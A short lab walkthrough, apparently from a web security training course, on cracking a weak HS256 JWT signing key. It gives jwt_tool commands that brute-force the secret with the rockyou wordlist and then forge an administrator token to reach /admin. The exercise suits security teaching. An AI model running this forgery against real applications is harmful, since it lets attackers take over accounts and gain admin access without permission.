Lab 3 - Weak Signing Key

Some signing algorithms, such as HS256 (HMAC + SHA-256), use an arbitrary, standalone string as the secret key resulting in the key can be easily guess/brute-forced

Grab the JWT Token from the session key

We will use the jwt_tool to crack the secret key using the -C and -d for the dictionary

python3 jwt_tool.py [TOKEN] -C -d /usr/share/wordlists/rockyou.txt

The secret key is: secret1

Now we change the sub parameter to administrator and sign the JWT Token with the secret key with -S to specify the algorithm and -p to specify the key

python3 jwt_tool.py [TOKEN] -T -S hs256 -p secret1

Replace the session with the new generated Token and we can access /admin

PreviousLab 2 - Flawed Signature Verification NextJWT Header Parameter Injection

Last updated 9 months ago